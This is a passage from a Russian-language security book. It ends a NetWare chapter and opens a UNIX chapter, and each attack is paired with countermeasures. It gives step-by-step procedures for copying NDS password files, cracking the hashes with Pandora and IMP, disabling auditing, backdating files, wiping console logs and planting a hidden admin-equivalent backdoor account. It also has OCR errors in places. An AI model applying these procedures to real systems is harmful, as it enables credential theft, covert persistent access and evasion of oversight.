    Средства NetBasic по умолчанию устанавливаются на всех серверах NetWare 4.x, так что их очень часто используют для получения доступа к файлам NDS. Для этого выполните следующую последовательность действий и команд.
    1. С помощью команды SYS: \PUBLlc\rconsole получите доступ к консоли rconsole.
    2. unload conlog (удаляет утилиту, регистрирующую консольные сообщения, и отключает режим регистрации).
    3. load netbasic.nlm.
    4. shell.
    5. cd \_netware (скрытый системный каталог, который можно увидеть только с системной консоли).
    6. md \login\nds.
    7. copy block.nds \login\nds\block.nds.
    8. copy entry.nds \login\nds\entry.nds.
    9. copy partitio.nds \login\nds\partitio.nds.
    10. copy value.nds \login\nds\value.nds.
    11. exit (выход из оболочки).
    12. unload netbasic.
    13. load conlog (вновь загружаем утилиту регистрации).
    14. Со стороны клиента воспользуйтесь командой mар, чтобы подключить сетевой диск, указав путь к созданному ранее каталогу LOGINXNDS.
    15. Скопируйте файлы * .NDS на свой локальный компьютер.
    16. Приступайте к взлому.

    dsmaint



    Может оказаться, что на целевом сервере язык сценариев NetBasic не установлен. В этом случае придется воспользоваться альтернативным средством — dsmaint. Этот модуль NLM не является стандартным компонентом NetWare 4.11, однако его можно загрузить с Web-узла компании Novell http://www. support.novell.com. Файл называется DS411P.EXE. Однако будьте осторожны: при использовании компонента dsmaint работа службы каталога будет автоматически завершена, так что не стоит использовать его в рабочее время. Для того чтобы вернуться к исходному состоянию службы каталогов, необходимо запустить процесс восстановления. Другими словами, эти действия лучше не выполнять на рабочем сервере.
    1. Подключите сетевой диск, указав каталог SYS: SYSTEM.
    2. Скопируйте на сетевой диск модуль dsmaint. nlm.
    3. С помощью команды rconsole получите доступ к виртуальной консоли.
    4. unload conlog (удаляет утилиту, регистрирующую консольные сообщения, и отключает режим регистрации).
    5. Введите команду load dsmaint.
    6. Выберите команду Prepare NDS For Hardware Upgrade.
    7. Зарегистрируйтесь в качестве администратора.
     В этот момент будет выгружена служба каталогов.
    После этого в каталоге SYS: SYSTEM будет автоматически сохранен файл backup.nds.
    1. Выберите команду Restore NDS Following Hardware Upgrade.
    2. Введите команду load conlog.
    3. Co стороны клиента подключите сетевой диск, указав путь к каталогу SYS:SYSTEM.
    4. Скопируйте файл backup. nds на свой локальный компьютер.
    5. Воспользуйтесь утилитой extract из набора Pandora и создайте четыре файла NDS (block, entry, partitio и value).
    6. Приступайте к взлому.
    Более старый загружаемый модуль dsrepair.nlm также предоставляет возможность подготовиться к обновлению аппаратного обеспечения. При этом в каталоге SYS: SYSTEM тоже будут созданы резервные копии файлов NDS. Однако этот модуль можно использовать только в более ранних версиях системы NetWare 4.x и, кроме того, он абсолютно не пригоден для применения в системах, в которых установлены пакеты обновления.

    jcmd



    За последние шесть лет компания JRB Software Limited разработала прекрасные утилиты для системы NetWare, многие из которых можно применять для аудита ее системы безопасности. Однако в отличие от сценариев NetBasic, утилита jcmd не позволяет скопировать открытые файлы NDS. Так что, как и модуль dsmaint.nlm, ее не рекомендуется устанавливать на рабочем сервере. Для обхода этого ограничения необходимо выгрузить службу каталогов. Чтобы скопировать файлы NDS с помощью утилиты jcmd, выполните следующие действия.
    1. Подключите сетевой диск, указав путь к каталогу SYS : SYSTEM.
    2. Скопируйте на сетевой диск модуль jcmd.nlm.
    3. С помощью команды rconsole получите доступ к виртуальной консоли.
    4. unload conlog (удаляет утилиту, регистрирующую консольные сообщения, и отключает режим регистрации).
    5. unload ds.
    6. load jcmd
    7. cd \_netware (на экране появится информация, представленная на следующем рисунке).


    8. dir *.* (для того чтобы с помощью модуля jcmd увидеть имена файлов, нужно использовать символы шаблона)
    9. md \login\nds.
    10. copy block.nds \login\nds.
    11. copy entry.nds \login\nds.
    12. copy partitio.nds \login\nds.
    13. copy value.nds \Iogin\nds.
    14. exit (выход из оболочки).
    15. load ds.
    16. load conlog.
    17. Co стороны клиента воспользуйтесь командой map и подключите сетевой диск, указав путь к каталогу LOGIN\NDS.
    18. Скопируйте файлы * .NDS на свой локальный компьютер.
    19. Приступайте к взлому.

    Контрмеры против "захвата" файлов NDS



    Меры защиты против "захвата" данных NDS сводятся к уменьшению количества средств, которые могут быть для этого использованы.
    1. Зашифруйте пароль утилиты rconsole, как описывалось выше.
    2. Удалите модуль netbasic.nlm из каталога SYS: \SYSTEM и примените к этому каталогу утилиту purge. Как правило, этот модуль оказывается ненужным.

    Взлом файлов NDS



    Как только взломщики смогли скопировать файлы NDS, можно считать, что они выполнили большую часть поставленной задачи. Сделайте все возможное, чтобы не допустить этого. Как только получены файлы NDS, взломщики, скорее всего, предпримут попытку взломать эти файлы, воспользовавшись специальными средствами. Для этого подойдет любая из свободно распространяемых программ, например IMP, разработанная Шейдом (Shade), или утилиты crypto/crypto2 из пакета Pandora.
    С точки зрения администратора, совсем не лишним будет загрузить свои собственные файлы NDS, воспользовавшись описанными выше приемами, а затем попробовать их взломать. При этом можно применить очень большой файл словаря. Когда будет получен пароль пользователя, его можно уведомить об этом и попросить, чтобы пароль был изменен. Помимо реализованной политики аудита подобные изыскания могут оказаться очень информативными и позволят оценить промежуток времени, в течение которого относительно безопасно использовать одни и те же пароли.
    Для взлома файлов NDS могут пригодиться также утилиты crypto и crypto2. Кроме того, их можно применять для взлома с использованием словаря. Для того чтобы приступить к взлому, выполните следующие действия.
    1. Скопируйте файл backup.nds или backup.ds в каталог \PANDORA\EXE.
    2. С помощью утилиты extract извлеките из файла backup.nds четыре файла NDS. extract -d
    3. Для извлечения из файлов NDS хэш-кодов паролей и создания файла password.nds снова воспользуйтесь утилитой extract, как показано на следующем рисунке. extract -n


    4. Запустите утилиту crypto или crypto2 для взлома файла password.nds "в лоб" или с использованием словаря, как показано на следующем рисунке.
    crypto -u Admin
     cryptoZ dict.txt —u deoane


    IMP 2.0



    Программа IMP, разработанная Шейдом (Shade), имеет графический интерфейс и позволяет использовать оба режима: прямого взлома и с использованием словаря. Второй режим оказывается чрезвычайно быстрым: при использовании словаря размером 933,224 слов весь процесс на компьютере Pentium с частотой 200 МГц занимает лишь несколько минут. Единственным ограничением программы IMP является то, что пароли всех учетных записей должны иметь одну и ту же длину (к счастью, IMP рядом с именем пользователя отображает и длину пароля).
    Программу IMP можно найти по адресу http: //www. wastelands .gen.nz/.
    К четырем файлам NDS, скопированным с помощью сценария NetBasic или сгенерированным с использованием утилиты extract из пакета Pandora, относятся файлы block.nds, entry.nds, partitio.nds и value.nds. Для того чтобы приступить к взлому, достаточно иметь в своем распоряжении лишь файл partitio.nds. Запустите программу IMP и загрузите файл с диска. Затем установите требуемый режим и запустите процесс на выполнение.
    В диалоговом окне программы IMP отобразится полное дерево с каждым пользователем и длиной его пароля, как видно из рис. 7.8. Эта информация важна по двум следующим причинам.

    •  Эти данные помогут узнать, какой длины пароли используются пользователями.
    •  Вы сможете управлять процессом прямого взлома (который наверняка займет какое-то время) и направить атаку на получение лишь коротких паролей (до семи или восьми символов).



    Рис. 7.8. Программа IMP предоставляет важную информацию, которая помогает осуществлять направленные атаки


    15.gif

    Изображение: 

    16.gif

    Изображение: 

    17.gif

    Изображение: 

    18.gif

    Изображение: 

    11. Редактирование журналов регистрации



    Редактирование журналов регистрации


    Профессиональные взломщики обязательно выполнят эту задачу, чтобы скрыть следы своей деятельности. Сделать это можно, отключив систему аудита, изменив время последнего обращения и модификации файлов, а также откорректировав файлы журналов.

    Отключение системы аудита



    При выполнении своих злонамеренных действий умные взломщики обязательно проверят, установлена ли система аудита, а затем отключат регистрацию определенных событий. Вот несколько шагов, которые предпримет взломщик, чтобы отключить систему аудита для службы каталогов и серверов.
    1. Запустите утилиту auditcon из каталога SYS: \PUBLIC.
    2. Выберите команду Audit Directory Services.
    3. Выберите требуемый контейнер и нажмите клавишу <F10>.
    4. Выберите команду Auditing Configuration.
    5. Выберите команду Disable Container Auditing.
    6. Теперь можно приступать к добавлению контейнеров и пользователей в выбранный контейнер.

    Изменение атрибутов файлов



    Если взломщик изменил файл autoexec.ncf или netinfo.cfg, то ему вряд ли  захочется, чтобы об этом кому-либо стало известно. Для изменения даты последнего обращения к этим файлам прекрасно подходит утилита SYS:PUBLIC\filer. Как и команда touch систем UNIX и NT, filer — это утилита DOS, предназначенная для поиска файлов и изменения их атрибутов. Модифицировать атрибуты файла очень просто. Для этого нужно сделать следующее.
    1. Запустите утилиту filer из каталога SYS: PUBLIC.
    2. Выберите команду Manage files and directories.
    3. Найдите каталог, в котором расположен требуемый файл.
    4. Выделите его.
    5. Выберите команду View/Set file information.
    6. Измените значения полей Last accessed date и Last modified date, как показано на следующем рисунке.



    19.gif

    Изображение: 

    12. Журналы консольных сообщений



    Журналы консольных сообщений


    Утилита conlog.nlm предоставляет возможность записи консольных сообщений и ошибок, например о выявлении вторжений и блокировании учетных записей. Получив доступ к утилите rconsole, взломщик без проблем может ввести команду unload conlog, отключив режим регистрации сообщений в файле, а затем снова включить этот режим и возобновить запись сообщений в совершенно новый файл console.log. При этом предыдущий файл удаляется, а вместе с ним и все записанные ошибки и сообщения. Грамотный системный администратор должен рассматривать такую ситуацию как попытку взлома. К сожалению, на практике ее иногда относят к разряду необъяснимого.
    Системные ошибки и сообщения, генерируемые в процессе загрузки сервера и выполнения им операций, постоянно регистрируются в файле SYS: SYSTEMX sysSerr.log. Обладая привилегиями администратора, взломщик способен отредактировать этот файл и удалить из него сообщения, связанные с его деятельностью, включая блокирование используемой им учетной записи.

    Контрмеры против редактирования журналов регистрации



    Следите за изменениями файлов console.log и sysSerr.log. Порекомендовать какие-либо простые способы защиты нельзя. Контролируйте администраторов (или взломщиков), которые знают о том, что решаемая ими задача может оказаться неразрешимой. И проверяйте содержимое файлов журналов в надежде на то, что в них найдут отражение сообщения об отключении системы аудита.
    1. Запустите утилиту SYS: PUBLlCXauditcon.
    2. Выберите команду Audit configuration.
    3. Выберите команду Audit by file/Directory.
    4. Найдите файлы SYS:ETC\console.log и SYS:SYSTEM\sys$err.log.
    5. Выделите каждый из файлов и нажмите клавишу <F10>, чтобы подключить систему аудита и приступить к записи сообщений.
    6. Выйдите из утилиты auditcon.

    "Потайные ходы"



    Самым эффективным "потайным ходом" системы NetWare является то, чего вы никогда не сможете добиться самостоятельно,— "осиротевшие" объекты (orphaned object). Использование скрытого объекта OU (Organizational Unit), содержащего пользователя с правами, эквивалентными администратору, и правами опекунства на свой собственный контейнер, позволит эффективно скрыть этот объект.
    1. Зарегистрируйтесь в дереве NDS в качестве администратора или с эквивалентными правами.
    2. Запустите утилиту NetWare Administrator (nwadmn3x.exe).
    3. В глубине дерева создайте новый контейнер. Щелкните правой кнопкой на существующем объекте OU и создайте новый объект OU, выбрав команду Create, a затем элемент Organizational Unit.
    4. Внутри этого контейнера создайте новый объект-пользователь. Щелкните правой кнопкой на новом контейнере, выберите команду Create, а затем — элемент User.
    5. Предоставьте объекту-пользователю полные права опекунства на его собственный объект. Щелкните правой кнопкой на новом пользователе, и выберите команду Trustees of this Object. Теперь пользователь является явным опекуном.
    6. Назначьте этому пользователю полные права опекунства на новый контейнер. Щелкните правой кнопкой на новом контейнере и выберите команду Trustees of this Object. Сделайте объект-пользователь явным опекуном нового контейнера, установив все флажки, как показано на следующем рисунке.
    7. Измените свойства пользователя таким образом, чтобы он получил права, эквивалентные администратору. Щелкните правой кнопкой на объекте-пользователе, выберите в появившемся контекстном меню команду Details, перейдите во вкладку Security Equal To, щелкните на кнопке Add и выберите Admin.
    8. Модифицируйте фильтр наследуемых прав (inherited rights filter — IRF) контейнера, отменив права Browse и Supervisor.

    При выполнении п. 8 будьте осторожны, поскольку после этого контейнер и созданный объект-пользователь станут невидимыми для всех пользователей, включая Admin. Администраторы не смогут увидеть или удалить этот объект. Сокрытие объекта от администратора оказывается возможным из-за того, что в дереве NDS можно отменить права supervisor для любого объекта или свойства.

    9. Теперь зарегистрируйтесь с помощью только что созданного "потайного хода". Не забывайте, что в дереве вы не сможете увидеть новый контейнер. Следовательно, в процессе регистрации потребуется ввести контекст вручную, как видно на следующем рисунке.


    Для получения более подробной информации обратитесь на Web-узел хакерской лаборатории NMRC (Nomad Mobile Research Centre) (http://www.nmrc.org). Симпл Номад (Simple Nomad) подробно описал эту технологию в разделе Unofficial Hack FAQ по адресу http://www.nmrc.org/faqs/hackfaq/ hackfaq.html.

    Контрмеры против "потайныхходов"



    Для защиты от подобных нападений можно использовать несколько средств, как свободно распространяемых, так и коммерческих.
    Среди коммерческих программных продуктов можно порекомендовать набор средств администрирования EMS/NOSadmin версии 6 (http://www.bindview.com) от компании BindView. Ее можно использовать для поиска скрытых объектов.
    Из категории свободно распространяемого программного обеспечения заслуживает внимания программа Hidden Object Locator, которую можно найти по адресу http://www.netwarefiles.com/utils/hobjloc.zip. Эта программа запускается на сервере в качестве модуля NLM и выполняет сканирование дерева NDS на предмет поиска объектов, у которых отсутствуют права просмотра для зарегистрированных пользователей (обычно Admin). Эта программа имеет небольшой размер (87 Кбайт) и абсолютна бесплатна, что делает ее прекрасным решением проблемы скрытых объектов.
    Компания Novell предоставляет лишь один метод решения описанной проблемы — подключение системы аудита. С помощью утилиты SYS:PUBLlC\auditcon можно регистрировать событие Grant Trustee.
    1. Запустите утилиту auditcon.
    2. Выберите команду Audit Directory Services.
    3. Выберите команду Audit Directory Tree.
    4. Выберите контейнер, для которого нужно подключить систему аудита, и нажмите клавишу <F10>.
    5. Выберите команду Enable Container Auditing.
    6. Нажимайте клавишу <Esc> до тех пор, пока не вернетесь в главное меню.
    7. Выберите команду Enable Volume Auditing.
    8. Выберите команду Auditing Configuration.
    9. Выберите Audit By Event.
    10. Выберите Audit By User Events. 
    11. Включите режим Grant Trustee.
    Конечно, предлагаемый метод предполагает, что взломщики не окажутся достаточно умными и перед созданием "потайного хода" не отключат систему аудита.


    20.gif

    Изображение: 

    13. Резюме



    Резюме


    Несмотря на большой путь, пройденный компанией Novell в процессе разработки надежной сетевой операционной системы, многие вопросы обеспечения безопасности оказались вне ее поля зрения. В данной главе вы увидели, насколько легко предпринять атаку на сервер NetWare, получить доступ к дереву NDS и серверу на уровне пользователей, а затем — с правами администратора. Были рассмотрены различные слабые стороны системы NetWare, а также средства, с помощью которых взломщик может получить полный контроль на всем деревом NDS.
    Для каждого из описанных слабых мест существуют соответствующие контрмеры, и многие из них сводятся, по существу, к одношаговой процедуре. Эти методы защиты являются очень простыми, однако далеко не все администраторы понимают важность их использования.


    Глава 8. Уязвимость UNIX



    Глава 8. УЯЗВИМОСТЬ UNIX




    1. Уязвимость UNIX



    Уязвимость UNIX


    Бытует мнение, что стремление получить доступ к системе UNIX в качестве пользователя root столь же неискоренимо, как наркотическая зависимость. Причина интереса к таким привилегиям уходит корнями в те времена, когда система UNIX только появилась на свет, поэтому мы предпримем небольшой исторический экскурс и напомним, как эта система возникла и как развивалась.


    2. root: в поисках сокровища



    root: в поисках сокровища


    В 1969 году Кен Томпсон (Ken Thompson), к которому несколько позднее присоединился его коллега по работе в компании AT&T Дэнис Ричи (Denis Richie), решили, что проект MULTICS (Multiplexed Information and Computing System) развивается слишком медленно. Они приняли решение "подтолкнуть" этого проект, и в результате появилась новая операционная система, названная UNIX, которая навсегда изменила мир компьютеров. Система UNIX проектировалась как развитая, производительная, многопользовательская операционная система, которая должна была показывать прекрасные результаты при выполнении программ, особенно небольших программ, названных инструментами (tool). Обеспечение безопасности не было ключевым требованием к системе, однако при правильном подходе к настройке UNIX может обеспечивать высокую степень безопасности. Популярность UNIX стала результатом ее открытости для доработок и расширений функций ядра системы, а также благодаря многочисленным небольшим инструментам, делающей эту систему столь мощной. Первые работы по созданию и развитию UNIX велись в основном в компании Bell Labs или в университетах, где безопасность обеспечивалась путем физических мероприятий. Иными словами, любой, кто имел физический доступ к системе UNIX, автоматически считался авторизованным пользователем. Очень часто защита учетной записи root с помощью пароля считалась чем-то ненужным и раздражающим, в связи с чем она отключалась.
    Хотя за последние 30 лет операционная система UNIX и ее клоны были значительно усовершенствованы, отношение к безопасности в UNIX изменилось незначительно. Многие недобросовестные разработчики и хакеры изучают ее исходный код в поиске изъянов в системе защиты. Более того, считается престижным опубликовать сведения о найденном недостатке в каком-нибудь списке рассылки, посвященном вопросам безопасности, например Bugtraq. В этой главе мы также будем вести себя как хакеры, чтобы узнать, как можно получить скрытый доступ к системе в качестве пользователя root и зачем это нужно. При чтении материала этой главы не забывайте, что в системе UNIX имеется два уровня доступа — в качестве всемогущего суперпользователя root и в качестве любого другого пользователя. Таким образом, суперпользователя не может заменить никто!


    3. Краткий обзор



    Краткий обзор


    Как вы, должно быть, помните, в главах 1-3 мы рассматривали, как идентифицировать систему, работающую под управлением UNIX, и провести инвентаризацию информации, доступной на этой системе. Для этого мы использовали средства сканирования портов, такие как nmap, позволяющие установить перечень открытых TCP/UDP портов, а также определить версию операционной системы или устройства. Для инвентаризации служб RPC и точек монтирования NFS мы использовали, соответственно, утилиты rpcinfo и showmount. Мы также использовали такую универсальную утилиту, как netcat (nc) для сбора маркеров, с помощью которых можно легко установить, какие приложения и каких версий используются на исследуемом компьютере. В этой главе мы продолжим изучение методов исследования системы UNIX. Необходимо помнить, что, прежде чем приступать к глубокому исследованию системы, необходимо провести тщательную подготовку, позволяющую получить как можно более полную картину сетевого окружения и конфигурации изучаемой системы. Сбор информации должен быть как можно более тщательным, чтобы не упустить из виду ни одной детали. Только после получения такой информации можно делать какие-то предположения о потенциальных изъянах, которые могут присутствовать в системе зашиты изучаемого компьютера. Этот процесс называется составлением схемы уязвимых мест.


    4. Составление схемы уязвимых мест



    Составление схемы уязвимых мест


    Составление схемы уязвимых мест (vulnerability mapping) — это процесс нахождения соответствия между определенными атрибутами безопасности системы с соответствующими явными или потенциальными изъянами. Данный этап является критичным при проведении реального обследования системы, поэтому его важность нельзя недооценивать. Взломщик должен обязательно составить схему, показывающую, как атрибуты, такие как находящиеся в состоянии ожидания службы, определенные версии запущенных серверов (например, Apache 1.3.9 для HTTP и sendmail — для SMTP), архитектура системы, информация о пользовательских именах и так далее, соотносятся с потенциальными дефектами системы защиты. Для выполнения этой задачи взломщик может воспользоваться одним из следующих методов.

    •  Вручную определить, как соотносятся определенные атрибуты системы с информацией о выявленных недостатках, которую можно получить из общедоступных источников, например бюллетеня Bugtraq, на Web-узле координационного центра CERT (Computer Emergency Response Team), специализирующегося на изучении проблем безопасности Internet (http://www.cert.org), и от непосредственных разработчиков тех или иных продуктов. Хотя этот процесс достаточно длителен и утомителен, в результате можно получить очень подробную картину потенциальных уязвимых мест без необходимости непосредственного изучения в интерактивном режиме интересующей взломщика системы.
    •  Применить общедоступные специальные инструменты (exploit), которые можно найти в разнообразных списках рассылки, посвященных вопросам безопасности, и на многочисленных Web-узлах. Кроме того, взломщик может написать собственный программный код. Такие программы могут определить наличие реальных уязвимых мест с высокой степенью точности.
    •  Использовать средства, предназначенные для автоматического сканирования систем в поисках уязвимых мест. К заслуживающим доверия коммерческим продуктам этого класса относятся Internet Scanner от компании Internet Security Systems (www.iss.net) или CyberCop Scanner от Network Associates (www.nai.com). Из бесплатных утилит можно выделить Nessus (www. nessus.org) И SAINT (http ://www. wwdsi.com/saint/).

    У каждого из этих методов имеются свои достоинства и недостатки. Однако необходимо отметить, что только взломщики с низкой квалификацией (так называемые "script kiddies" — малыши) пропускают этап составления схемы уязвимых мест, сразу же пытаясь применить к интересующей их системе первый попавшийся инструмент, не имея ни малейшего представления о том, как и почему данный инструмент может привести к получению результата. Мы нередко были свидетелями реальных попыток взлома с помощью утилит, предназначенных для использования в системе UNIX, которые применялись для проникновения в систему Windows NT. Нет необходимости говорить о том, что такие горе-взломщики сразу же выдавали свою некомпетентность и никогда не добивались желаемого результата. В следующем списке приведена последовательность операций, которые необходимо выполнить при составлении схемы уязвимых мест.

    •  Провести исследование сети, в которой находится целевой компьютер.
    •  Составить схему соответствия атрибутов, таких как операционная система, архитектура, номера версий служб, находящихся в состоянии ожидания запросов, и так далее, с перечнем известных уязвимых мест и методов проникновения.
    •  Идентифицировать ключевые системы и отобрать из них те, на которых стоит сосредоточить усилия.
    •  Отобрать потенциальные точки проникновения и определить их приоритеты.


    5. Удаленный и локальный доступ



    Удаленный и локальный доступ


    Остальной материал данной главы разбит на две части, первый из которых посвящен использованию удаленного доступа, а второй — локального. Удаленный доступ (remote access) определяется как доступ к системе, получаемый по сети (например, через сетевую службу, находящуюся в состоянии ожидания) или по другим коммуникационным каналам. О локальном доступе (local access) говорят в тех случаях, когда в распоряжении взломщика уже имеется интерактивный доступ к командной оболочке (command shell) или учетная запись для регистрации в системе (login). Попытки взлома при наличии локального доступа называются также атаками, направленными на расширение привилегий (privilege escalation attack). Важно понимать взаимосвязь удаленного и локального доступа. Логическая последовательность выполняемых взломщиком действий заключается в проникновении с помощью удаленного доступа, используя какой-либо изъян в защите службы, находящейся в состоянии ожидания запросов, с последующим получением локального доступа к командной оболочке. После получения интерактивного доступа к командной строке взломщик считается локальным пользователем системы. Поэтому сначала мы попытаемся логически отделить те типы взломов, которые используются для получения удаленного доступа, а затем рассмотрим соответствующие примеры. После этого мы покажем типичные методы, с помощью которых хакер, получивший удаленный доступ, может расширить свои локальные привилегии с целью сбора информации о локальной системе. Впоследствии с помощью этой информации он может попытаться расширить сферу своего влияния. Необходимо подчеркнуть, что данная глава, конечно же, не является исчерпывающим руководством по обеспечению безопасности системы UNIX. Если вам нужна более подробная информация, можно порекомендовать книгу Practical UNIX & Internet Security Симеона Гарфинкеля (Simson Garfinkel) и Джена Спаффорда (Gene Spafford). Кроме того, ограниченный объем данной главы не позволяет включить в нее описание всех возможных методов проникновения в систему UNIX, особенно с учетом всего разнообразия ее клонов и версий. Мы лишь попытаемся определить категории возможных методов взлома и изложить их теоретические основы. При появлении новых методов атак эта информация позволит быстрее разобраться, как эти методы работают, даже если в литературе вы не найдете соответствующего описания. Как видите, мы предпочитаем не просто однократно "накормить голодного", а "научить его ловить рыбу, чтобы он смог сам прокормить себя в любое время".


    6. Удаленный доступ



    Удаленный доступ


    Как уже говорилось выше, для удаленного доступа используется локальная сеть или какой-либо другой коммуникационный канал, такой как модемная связь с системой UNIX, выступающей в роли сервера удаленного доступа. Исходя из нашего опыта, мы можем сказать, что большинство организаций заботит именно безопасность удаленного доступа, осуществляемого по каналам аналоговой связи или ISDN. Однако мы ограничим наше исследование лишь методами получения доступа к системе UNIX по сети через протокол TCP/IP. В конце концов, протокол TCP/IP является краеугольным камнем Internet, поэтому именно эта тема заслуживает первоочередного внимания при обсужле-нии вопросов обеспечения безопасности UNIX.
    Средства массовой информации создали некий миф вокруг темы нарушена-: системы защиты системы UNIX, согласно которому для этого нужно проявить сг-реиг-ленное искусство, граничащее с мистикой. На самом деле существует три впо.:-;е реальных основных метода для удаленного проникновения через систему зашиты UNIX
    1. Проникновение через службу, находящуюся в состоянии ожидания запросов (TCP/UDP).
    2. Использование в качестве плацдарма системы UNIX, обеспечивающей безопасность двух или более сетей.
    3. Применение методов удаленного взлома, подразумевающих скрытое вовлечение пользователей (созданный с преступным умыслом специальный Web-узел, электронная почта с вложенным "троянским конем" и т.д.).
    Давайте рассмотрим несколько примеров, которые помогут нам лучше разобраться в различных типах атак, относящихся к одной из этих категорий.

    •  Проникновение через службу, находящуюся в состоянии ожидания запросов. Кто-то дает вам идентификатор пользователя и пароль и говорит: "Взломай мою систему". Именно так обстоит дело с проникновением через службу, находящуюся в режиме ожидания. Действительно, как можно зарегистрироваться в системе, если в ней не запущены службы, позволяющие интерактивную регистрацию (telr.et. ftp. rlogin или ssh)? А как насчет обнаруженных лишь на этой неделе очередных изъянах службы wu-ftpd? В вашей системе они имеются? Вполне возможно. сдна:<о взломщики, скорее всего, будут использовать для получения доступа служб) -.-.-_-f tpd только в том случае, если она запущена и находится в состоянии ожидания. Таким образом, можно жестко сформулировать правило — доступ через службу можно получить тогда и только тогда, когда она находится в состоянии ожидания запросов. В противном случае удаленный доступ через нее получить невозможно.
    • Использование брандмауэра в качестве маршрутизатора. Через ваш брандмауэр, на котором установлена система UNIX, в сеть проник взломщик. "Этого не может быть, — скажете вы, — ведь мы не поддерживаем никаких входящих служб!" Во многих случаях взломщики обходят брандмауэры UNIX путем маршрутизации своих пакетов через брандмауэры под видом пакетов, исходящих от внутренних систем. Эта уловка срабатывает, поскольку в ядре UNIX по умолчанию включен режим пересылки IP-пакетов для тех приложений, которым такой режим нужен. Поэтому очень часто взломщику и не нужно взламывать сам брандмауэр — достаточно использовать его в качестве маршрутизатора.
    •  Удаленный взлом с вовлечением пользователей. Вы отключили все опасные для системы защиты UNIX службы и полагаете, что обеспечили безопасность? Не спешите с выводами! А что, если кто-то из пользователей попробует открыть страницу по адресу вроде http://www.evilhacker.org и броузер выполнит вредоносный код, в результате чего будет установлено обратное соединение с этим узлом? Тогда компьютер, находящийся по адресу evilhacker.org, сможет получить доступ к пользовательскому компьютеру. Трудно даже представить, какие последствия может повлечь за собой работа в Web под именем суперпользователя root! Что произойдет, если ваша программа сетевых пакетов окажется восприимчивой для атак, приводящих к переполнению буфера (http: //www.w00w00.org/advisories/snoop.html)?

    В этом разделе мы рассмотрим типичные методы удаленных атак, которые подпадает под одну из приведенных выше категорий. Если вы хотите понять, как взломщику далось проникнуть в систему, попробуйте найти ответы на три следующих вопроса.
    1. Используются ли службы, находящиеся в состоянии ожидания запросов?
    2. Поддерживает ли система маршрутизацию?
    3. Выполнял ли пользователь или пользовательская программа команду, которая могла стать причиной нарушения системы защиты?
    Мы уверены, что вы дадите положительный ответ по крайней мере на какой-то адин из этих вопросов.

    Подбор паролей



    Обсуждение возможных методов взлома системы UNIX мы начнем с одного из самых популярных — подбора пароля путем простого перебора всех возможных вариантов, т.е. атаки "в лоб" (brute force attack). Такой подход может претить эстету хакинга, но, так или иначе, он был и остается одним из самых эффективных способов получения доступа к системе UNIX. Взлом путем перебора представляет собой не что иное, как подбор комбинации "идентификатор UID/пароль" для получения доступа к службе, которая до предоставления определенных привилегий выполняет аутентификацию пользователя. Среди самых популярных типов служб, которые чаще всего подвергаются подобным атакам можно выделить следующие.

    •  telnet
    •  FTP (File Transfer Protocol)
    •  r-утилиты (rlogin, rsh и т.д.)
    •  Secure Shell (ssh)
    •  Имена доступа SNMP
    •  POP (Post Office Protocol)
    •  HTTP/HTTPS (Hyper Text Transport Protocol)

    Как вы помните из предыдущих глав, посвященных исследованию сети и инвентаризации сетевых ресурсов, одной из самых главных задач, которые необходимо решить взломщику на этом этапе, — это установить реальные идентификаторы пользователей системы. С этой целью могут использоваться такие службы, как finger, rusers и sendmail. Получив список пользовательских учетных записей, взломщик может попытаться получить доступ к интересующей его системе путем подбора пароля к одной из этих учетных записей. К сожалению, многие пользовательские учетные записи защищаются либо с помощью легко угадываемого пароля, либо вовсе не имеют пароля. Самым лучшим примером этого правила является учетная запись рядового пользователя, в которой, как правило, пользовательское имя и пароль идентичны. Чем больше пользователей имеют доступ к системе, тем больше вероятность, что в ней найдется по крайней мере один такой пользователь. Можете поверить нам на слово, на своем веку мы встречали тысячи подобных случаев, занимаясь проверкой безопасности разных компаний. Почему же это явление столь распространено? Все очень просто: во-первых, люди не задумываются о том, как нужно выбирать пароли, а во-вторых, от них никто этого не требует.
    Хотя пароль можно подобрать вручную, зачастую для этого применяются утилиты, автоматизирующие этот процесс. Среди многочисленных общедоступных утилит такого рода можно выделить следующие.

    Защита от подбора паролей "в лоб"



    Наилучшим способом защиты от подбора пароля является использование трудно угадываемых паролей. В идеальном случае желательно использовать механизм одноразовых паролей. Существует ряд бесплатных утилит (табл. 8.1), с помощью которых решение задачи подбора пароля можно значительно затруднить.

    Таблица 8.1.Бесплатные утилиты, которые позволяют защититься от подбора паролей "в лоб"

    Инструмент
    Описание
    Адрес
    S/Key
    Система генерации одноразовых паролей
    http: //www.yak.net/skey/
    One Time Passwords In Everything (OPIE)
    Система генерации одноразовых паролей
    ftp .nrl . navy .mil /pub/ security/opie
    Cracklib
    Средство генерации паролей
    ftp: //ftp. cert . or g/ pub/ tools/cracklib/
    Npasswd
    Утилита, которую можно использовать вместо команды passwd
    http: //www.utexas .edu/ cc/unix/software/npasswd/
    Secure Remote Password
    Новый механизм для выполнения безопасной аутентификации с помощью пароля и обмена ключами в сети любого типа
    http: //srp. stanford, edu/srp/
    SSH
    Замещает r-команды и позволяет выполнять те же функции с поддержкой шифрования и аутентификации RSA
    http: //www.cs .hut . fi/ssh
    Помимо этих средств, необходимо реализовать хорошие процедуры управления паролями, соответствующие следующим основным требованиям.
    •  Обеспечение того, чтобы все пользователи применяли пароли.
    •  Принудительная смена паролей один раз в 30 дней для привилегированных пользователей и один раз в 60 дней для обычных пользователей.
    •  Минимальная длина пароля должна составлять шесть символов, а еще лучше — восемь.
    •  Регистрация неудачных попыток аутентификации.
    •  Настройка служб таким образом, чтобы после трех неудачных попыток регистрации выполнялся разрыв соединения.
    •  Реализация режима блокировки учетных записей везде, где это возможно (не забывайте при этом о возможных проблемах, связанных с отказом в обслуживании, специально вызываемых действиями взломщика).
    •  Отключение неиспользуемых служб.
    •  Использование средств генерации паролей, не позволяющих пользователям выбирать легко угадываемые пароли.
    •  Не использовать один и тот же пароль для доступа к разным системам.
    •  Не допускать, чтобы пользователи записывали свои пароли.
    •  Не допускать разглашения паролей посторонним.
    •  Использовать при возможности одноразовые пароли.
    •  Обеспечение того, чтобы встроенными учетными записями вида setup и admin не использовались пароли, установленные для них по умолчанию.

    Дополнительную информацию по выбору паролей можно найти в документе AusCERT SA-93:04.


    7. Взлом с использованием данных



    Взлом с использованием данных


